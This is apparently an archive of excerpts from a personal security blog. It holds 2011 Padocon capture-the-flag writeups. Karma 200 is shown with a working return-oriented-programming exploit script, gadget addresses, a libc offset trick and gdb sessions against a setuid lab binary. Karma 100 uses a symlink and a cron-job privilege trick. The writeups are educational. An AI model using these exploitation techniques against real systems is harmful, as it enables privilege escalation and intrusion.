
Total: 49

  • Gu1's Website - Posts tagged « conference »
    Hi. I was at Hackito Ergo Sum 2011 last weekend. I hadn't had the opportunity to write an article about the previous edition of this conference because my blog was more or less dead/closed, so I'll make up for it by telling you about this year's content. The level of the talks was very good and the atmosphere more cosmopolitan than at some other French conferences. The

    Original URL path: http://gu1.aeroxteam.fr/tags/conference/ (2015-12-30)

  • Gu1's Website - Padocon 2011, Karma 200 using ROP
    has almost no code, most of those gadgets are probably from libc functions and what not, so you can find them in any program compiled with gcc. We need a ROP gadget that reads at an address and adds (or subtracts) the result to a register, and I chose that one:

        0x804850eL: add eax, [ebx-0xb8a0008] ; lea esp, [esp+0x4] ; pop ebx ; pop ebp

    Then we have to put the GOT entry of a libc function (say strncpy) plus 0xb8a0008 in ebx, and the offset between that function and whatever function we choose to execute in the libc in eax. We can use this gadget to achieve that:

        0x8048300L: pop eax ; pop ebx ; leave

    We now have our two main gadgets, but there still are a number of problems we have to deal with. First, the second gadget ends with a leave. Since the leave instruction basically does mov esp, ebp ; pop ebp, we will need to make sure ebp points to the rest of our payload when calling this gadget. This is tricky with ASLR, so we will need a second retsled. Second, the address contains a null byte, and we can't put a null byte in an env variable or it will end the string. Since this is the only gadget containing pop eax found by ropeme, let's persist and disassemble it in objdump to see what instruction comes before the pop eax:

        user1@localhost$ objdump -M intel -d attackme | grep -A3 -B1 8048300
         80482fb:  e8 f0 01 00 00    call   80484f0 <__do_global_ctors_aux>
         8048300:  58                pop    eax
         8048301:  5b                pop    ebx
         8048302:  c9                leave
         8048303:  c3                ret

    It's a call to __do_global_ctors_aux. I believe the code is defined here in gcc. Because our program has no constructors to call, this function does nothing bad and we can include it in our gadget to get rid of that annoying null byte.

    If we want to have a more reliable exploit, we need to use retsleds, since the stack is affected by ASLR. I use two 12k retsleds, which makes a total of 96kB since the addresses are 4 bytes:

        #!/usr/bin/python
        from struct import pack
        from sys import stdout

        # address in the first retsled, found with aslr disabled for tests
        ADDR_RETSLED1 = 0xbffec330
        SINGLERET = pack("<I", 0x08048471)   # address to a simple ret
        RETSLED = SINGLERET * 1024 * 12
        # an address somewhere in the second ret sled, to use as new ebp for the leave instruction
        ADDR_RETSLED2 = ADDR_RETSLED1 + len(RETSLED)

        S = ""
        S += RETSLED                     # ret sled
        S += pack("<I", 0x080484e3)      # pop ebp
        S += pack("<I", ADDR_RETSLED2)   # new ebp, in the second ret sled
        S += pack("<I", 0x080482fb)      # call do_ctors ; pop eax ; pop ebx ; leave
        S += pack("<I", 0x...)           # new eax: the offset between the func we wanna call and strncpy
        S += pack("<I", 0x138e96e8)      # new ebx: strncpy@got.plt + 0xb8a0008
        S += pack("<I", 0xbffaaaaa)      # new ebp, just junk since never used
        S += RETSLED                     # second ret sled
        S += pack("<I", 0x0804850e)      # add eax, [ebx-0xb8a0008] ; lea esp, [esp+0x4] ; pop ebx ; pop ebp
        stdout.write(S)

    There still is a problem: we need to find an address we want to call in the libc. The obvious choice is execve, but if we try calculating the offset between strncpy and execve (or any exec* function):

        (gdb) p execve - strncpy@got.plt
        $4 = 0x26570
        (gdb) p execl - strncpy@got.plt
        $5 = 0x26870
        (gdb) p execv - strncpy@got.plt
        $6 = 0x266d0
        (gdb) p execvp - strncpy@got.plt
        $7 = 0x269d0

    That's right, a null byte in front of every offset. We were stuck at this point for some time. I looked for every function before strncpy in the libc (because a function located at a lower address means a negative offset that starts with 0xff); I couldn't find anything interesting, but then an idea came up: what if, instead of looking for a function located before strncpy, we looked for any function before strncpy that calls exec*? And sure enough, there was one:

        user1@localhost$ objdump -M intel -t /lib/libc.so.6 | egrep '\sstrncpy'
        0007a170 g    F .text  0000014e strncpy
        user1@localhost$ objdump -M intel -t /lib/libc.so.6 | egrep '^000[0-7]'
        [A lot, lot of mostly uninteresting functions]
        user1@localhost$ objdump -M intel -d /lib/libc.so.6 | egrep '^\s*[3-7][0-9a-f]{4}' | grep exec
           3b018:  e8 c3 56 06 00    call   a06e0 <execve>
           3b92e:  e8 0d 26 08 00    call   bdf40 <regexec@@GLIBC_2.3.4>
           3b97b:  e8 c0 25 08 00    call   bdf40 <regexec@@GLIBC_2.3.4>
           61d19:  e8 c2 ec 03 00    call   a09e0 <execl>

    The call at 0x3b018 is inside the do_system function (we didn't use system directly because it executes /bin/sh, which generally drops the effective uid we got from the suid binary). We can calculate the offset between strncpy and this call execve in gdb:

        (gdb) p do_system+0x468 - strncpy@got.plt
        $1 = 0xfffc0ea8

    If we try the exploit we have so far after disabling ASLR, we can see that it already works:

        user1@localhost$ PLOAD=$(python test_exploit.py) gdb -q attackme
        Reading symbols from /home/user1/attackme...(no debugging symbols found)...done.
        (gdb) # address of main's ret
        (gdb) b *0x08048471
        Breakpoint 1 at 0x8048471
        (gdb) # overwrite sebp with the address in the first retsled (ADDR_RETSLED1) and seip with a leave ; ret
        (gdb) r $(python -c 'from struct import pack; print "AAAA"*3 + pack("<I", 0xbffec330) + pack("<I", 0x08048302)')
        [regs]
          EAX: 0xBFFE765C  EBX: 0x002C1FF4  ECX: 0x00000008  EDX: 0xBFFE787F  o d I t S z A P c
          ESI: 0x00000000  EDI: 0x00000000  EBP: 0xBFFEC330  ESP: 0xBFFE766C  EIP: 0x08048471
          CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
        [code]
          0x8048471 <main+77>:  ret
          0x8048472:            nop
          0x8048473:            nop
        Breakpoint 1, 0x08048471 in main ()
        (gdb) x/3x $esp
        0xbffe766c:  0x08048302  0x00000002  0xbffe7714
        (gdb) nexti
        [regs]

    Original URL path: http://gu1.aeroxteam.fr/2011/01/28/padocon-2011-karma-200-using-rop/ (2015-12-30)

  • Gu1's Website - Posts tagged « buffer overflow »
    padocon, return oriented programming, writeup. Yet another writeup for the Padocon 2011. This time I'm gonna talk about karma200, a level that we did not validate during the CTF, but I was curious to see how I could exploit it, so I worked on it with Mysterie, kutio, teach and others these last few days. Like for karma100, we had ssh credentials to a linux box and found a

    Original URL path: http://gu1.aeroxteam.fr/tags/buffer%20overflow/ (2015-12-30)

  • Gu1's Website - Posts tagged « ctf »
    directory. Here is the source code. Enjoy:

        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>

        int main(int argc, char **argv)
        {
            char buf[4];
            if (argc < 2)

    2 Comments - Read more

    Padocon 2011 writeup: Karma 100
    By Gu1 on 21/01/2011 at 03:31 - tags: ctf, english, format string, padocon, writeup
    Hello. This is another writeup for the Padocon 2011 CTF. This time I'm gonna talk about a wargame-style binary exploitation level, karma 100. This one was not that difficult to exploit: in fact it took us only a couple of hours to obtain reliable code execution, but we were unable to find the flag until much later. We were given ssh credentials and, once logged in, we had a binary suid boom100 in our home directory, with the source code:

        #include <unistd.h>
        #include <stdio.h>
        /* hi guys. This is just warm up */
        int main(int argc, char **argv)

    5 Comments - Read more

    Padocon 2011 writeup: Forensic Quest
    By Gu1 on 18/01/2011 at 03:09 - tags: ctf, forensic, padocon, scapy, writeup
    Hi. The first big CTF of the year took place last weekend: Padocon 2011, a Korean CTF I had already taken part in last year. The CTF itself was pretty well done, good organisation. The challenges were interesting, no overly hardcore guessing. I took part with the team w0ea fhpr abhf; we must have had around 1800 points, but the full ranking hasn't been published yet. I worked on a few challenges, some were nice, like the Forensic Quest that I did with teach, bik3te and others. So here is a

    3 Comments - Read more

    smpCTF 2010 challenge 9 writeup
    By Gu1 on 22/07/2010 at

    Original URL path: http://gu1.aeroxteam.fr/tags/ctf/ (2015-12-30)

  • Gu1's Website - Posts tagged « english »
    to a linux box and found a setuid binary called attackme in the home directory. Here is the source code. Enjoy:

        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>

        int main(int argc, char **argv)
        {
            char buf[4];
            if (argc < 2)

    2 Comments - Read more

    Padocon 2011 writeup: Karma 100
    By Gu1 on 21/01/2011 at 03:31 - tags: ctf, english, format string, padocon, writeup
    Hello. This is another writeup for the Padocon 2011 CTF. This time I'm gonna talk about a wargame-style binary exploitation level, karma 100. This one was not that difficult to exploit: in fact it took us only a couple of hours to obtain reliable code execution, but we were unable to find the flag until much later. We were given ssh credentials and, once logged in, we had a binary suid boom100 in our home directory, with the source code:

        #include <unistd.h>
        #include <stdio.h>
        /* hi guys. This is just warm up */
        int main(int argc, char **argv)

    5 Comments - Read more

    smpCTF 2010 challenge 9 writeup
    By Gu1 on 22/07/2010 at 19:25 - tags: ctf, english, heap overflow, smpctf, writeup
    Note: this post is available

    Original URL path: http://gu1.aeroxteam.fr/tags/english/ (2015-12-30)

  • Gu1's Website - Posts tagged « padocon »
    to a linux box and found a setuid binary called attackme in the home directory. Here is the source code. Enjoy:

        #include <stdio.h>
        #include <stdlib.h>
        #include <string.h>

        int main(int argc, char **argv)
        {
            char buf[4];
            if (argc < 2)

    2 Comments - Read more

    Padocon 2011 writeup: Karma 100
    By Gu1 on 21/01/2011 at 03:31 - tags: ctf, english, format string, padocon, writeup
    Hello. This is another writeup for the Padocon 2011 CTF. This time I'm gonna talk about a wargame-style binary exploitation level, karma 100. This one was not that difficult to exploit: in fact it took us only a couple of hours to obtain reliable code execution, but we were unable to find the flag until much later. We were given ssh credentials and, once logged in, we had a binary suid boom100 in our home directory, with the source code:

        #include <unistd.h>
        #include <stdio.h>
        /* hi guys. This is just warm up */
        int main(int argc, char **argv)

    5 Comments - Read more

    Padocon 2011 writeup: Forensic Quest
    By Gu1 on 18/01/2011 at 03:09 - tags: ctf, forensic, padocon, scapy, writeup
    Hi. The first big CTF of

    Original URL path: http://gu1.aeroxteam.fr/tags/padocon/ (2015-12-30)

  • Gu1's Website - Posts tagged « return oriented programming »
    padocon, return oriented programming, writeup. Yet another writeup for the Padocon 2011. This time I'm gonna talk about karma200, a level that we did not validate during the CTF, but I was curious to see how I could exploit it, so I worked on it with Mysterie, kutio, teach and others these last few days. Like for karma100, we had ssh credentials to a linux box and found a

    Original URL path: http://gu1.aeroxteam.fr/tags/return%20oriented%20programming/ (2015-12-30)

  • Gu1's Website - Padocon 2011, writeup Karma 100
    strace'd the program to see what filename it tried to execute. Unfortunately the first address passed to execve was 0x003994c4 and it pointed to a series of null bytes, so we had to write something at this address too, because execve can't execute an empty string. Then we straced the program again with our payload and found out execve was trying to execute "\xa0\xc6", so we simply created a symlink:

        python -c 'import os; from stat import *; os.symlink("evilbinary", "\xa0\xc6")'

    And that was pretty much it. But then, wat do? We tried to read boom100's home directory, obviously, but no luck: it was chmoded 750 and chowned root:boom100. We did not have boom100's gid since the binary was only setuid. We searched for a long time, tried to find any file owned by boom100 that would allow us to log in, or at least to execute a command with sufficient privileges. The only file find found was /var/spool/mail/boom100, and it was empty. We gave up for the night and tried again the second day. At this point the file /var/spool/mail/boom100 contained data about some cron job that could not be executed. As you probably guessed, we needed to add a cron job. Since the cron daemon is running as root and logs in each account to execute jobs, we only needed to create a cron job that would put a copy of the key file somewhere else. So we first created a job that listed boom100's home directory:

        total 40
        drwxr-x---  4 root boom100 4096 Jan 14 02:55 .
        drwx--x--x 12 root root    4096 Jan 13 02:57 ..
        -rw-------  1 root boom100  229 Jan 12 22:40 .bash_history
        -rw-r--r--

    Original URL path: http://gu1.aeroxteam.fr/2011/01/21/padocon-2011-writeup-karma-100/ (2015-12-30)